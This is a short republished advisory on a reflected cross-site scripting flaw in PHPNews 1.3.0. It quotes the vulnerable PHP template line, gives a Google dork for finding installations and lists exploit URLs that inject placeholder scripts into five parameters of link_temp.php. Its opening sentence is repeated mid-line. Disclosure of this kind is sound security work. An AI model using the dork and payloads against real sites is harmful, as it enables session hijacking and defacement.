PHPNews 1.3.0 suffered from a Cross-Site Scripting (XSS) vulnerability, allowing PHPNews 1.3.0 suffered from a Cross-Site Scripting (XSS) vulnerability, allowing attackers to inject malicious client-side scripts into web pages. This was a reflected XSS, typically exploited via a specially crafted URL containing the script.
When a victim clicked such a link, their browser would execute the script within the PHPNews site's context. The root cause was inadequate input validation and output encoding of user-supplied data.
Successful exploitation could lead to session hijacking, website defacement, redirection to malicious sites, or malware distribution. This flaw underscored the importance of robust input sanitization and output encoding. Users were urged to upgrade or implement custom filtering to mitigate the risk.
PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews
-----
- Vulnerable Code:
<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />
-----
- Exploits:
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
PHPNews 1.3.0 Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 4
